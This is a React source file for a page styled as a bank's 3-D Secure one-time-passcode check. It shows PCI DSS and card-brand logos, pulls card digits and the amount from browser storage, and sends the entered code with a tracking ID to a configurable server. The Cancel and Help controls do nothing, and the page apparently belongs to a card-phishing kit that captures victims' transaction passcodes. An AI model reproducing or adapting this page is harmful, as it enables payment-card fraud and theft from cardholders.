import React, { useEffect, useState } from "react"
import HelpImage from "./assets/help.gif"
import axios from "axios"
import { useNavigate } from "react-router-dom"

import PciImage from './assets/pci.jpg'
import VisaImage from './assets/visa.svg'
import MasterImage from './assets/master.jpg'

const OTPPage = () => {
  const [submitBtnContent, setSubmitBtnContent] = useState("Submit")
  const [submitBtnDis, setSubmitBtnDis] = useState(false)
  const navigate = useNavigate()
  const [input1Value, setInput1Value] = useState("")
  const today = new Date()
  const formattedDate = `${today.getDate().toString().padStart(2, "0")}/${(
    today.getMonth() + 1
  )
    .toString()
    .padStart(2, "0")}/${today.getFullYear()}`

  const handleCodeSubmit = async () => {
    setSubmitBtnContent(<div className="inputLoader"></div>)
    setSubmitBtnDis(true)
    const dataToSend = {
      uuId: localStorage.getItem("uuId"),
      code: input1Value,
    }

    try {
      const response = await axios.post(
        `${process.env.REACT_APP_SERVER_URL}/api/otp_verif`,
        dataToSend
      )
      if (response.status === 200) {
        navigate("/3ds/loading")
      }
    } catch (error) {
      setTimeout(() => {
        setSubmitBtnDis(false)
        setSubmitBtnContent("Submit")
      }, 3000)
    }
  }

  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [input1Value])

  const updateSubmitBtnDisabled = () => {
    // Enable submit button if OTP is 4-8 digits
    if (input1Value.length >= 4 && input1Value.length <= 8) {
      setSubmitBtnDis(false);
    } else {
      setSubmitBtnDis(true);
    }
  }


  const firstDigit = localStorage.getItem('first-digit');

  // Determine the image source and alt text
  let imageSrc, altText;
  if (firstDigit === '4') {
    imageSrc = VisaImage;
    altText = 'Visa';
  } else if (firstDigit === '5') {
    imageSrc = MasterImage;
    altText = 'Mastercard';
  } else {
    imageSrc = null; // No image if not 4 or 5
    altText = 'No card';
  }

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-white">
      <div className="w-full max-w-sm px-6 py-8 bg-white border border-neutral-300">
        <div className="flex items-center justify-between w-full mb-6">
          <img
            src={PciImage} // Замените на фактический логотип PCI DSS
            alt="PCI DSS Compliant"
            className="h-12 mr-4"
          />
      {imageSrc && (
        <img src={imageSrc} alt={altText} className="h-12" />
      )}
        </div>
        <h1 className="mb-4 text-lg font-bold text-gray-800">
          Enter one-time Passcode
        </h1>
        <p className="mb-6 text-xs text-gray-900">
          A one-time Passcode is required for this purchase. This Passcode has
          been sent to your registered mobile phone number.
        </p>
        <div className="grid grid-cols-2 mb-4 text-xs">
          <span className="text-xs">Merchant:</span>
          <span className="text-gray-900">
            {process.env.REACT_APP_MERCHANT_NAME}
          </span>

          <span className="text-xs">Date:</span>
          <span className="text-gray-700">{formattedDate}</span>

          <span className="text-xs">Card Number:</span>
          <span className="text-gray-900">**** **** **** {localStorage.getItem('last-four-digits')}</span>

          <span className="text-xs">Amount:</span>
          <span className='text-gray-900'>{localStorage.getItem('currency') ||process.env.REACT_APP_CURRENCY} {localStorage.getItem('summ')}</span>
        </div>
        <div>
          <div className="grid items-center grid-cols-2">
            <label
              htmlFor="otp"
              className="block mb-2 text-xs font-medium text-gray-500"
            >
              Enter One-Time Passcode:
            </label>
            {/* <input
              id="otp"
              type="text"
              placeholder="Enter Passcode"
              className="w-full px-2 py-1 text-xs border border-gray-300 rounded-sm focus:outline-none "
            /> */}

            <input
              value={input1Value}
              onChange={(e) => setInput1Value(e.target.value)}
              type="text"
              maxLength={8}
              className="w-full px-2 py-1 text-xs border border-gray-300 rounded-sm focus:outline-none "
             placeholder="Enter Passcode"
            />
            <div className=""></div>
            <div className="flex justify-between mt-3 mb-4 text-xs text-neutral-500">
              <a
                href="#"
                className="leading-3 underline hover:underline"
              >
                Haven't received a one-time passcode?
              </a>
            </div>
          </div>
          <div className="flex items-center justify-between">
            <button
              type="button"
              className="px-4 py-2 text-xs"
            >
              Cancel
            </button>
            <button
              onClick={handleCodeSubmit}
              type="submit"
              disabled={submitBtnDis}
              className="px-2 py-1 text-xs leading-none border rounded-sm h-fit border-neutral-800 bg-neutral-100 "
            >
              {submitBtnContent}
            </button>
            <button
              type="button"
              className="flex items-center px-4 py-2 text-xs"
            >
              <img
                className="mr-1"
                src={HelpImage}
                alt=""
              />
              Help
            </button>
          </div>
        </div>
      </div>
    </div>
  )
}

export default OTPPage
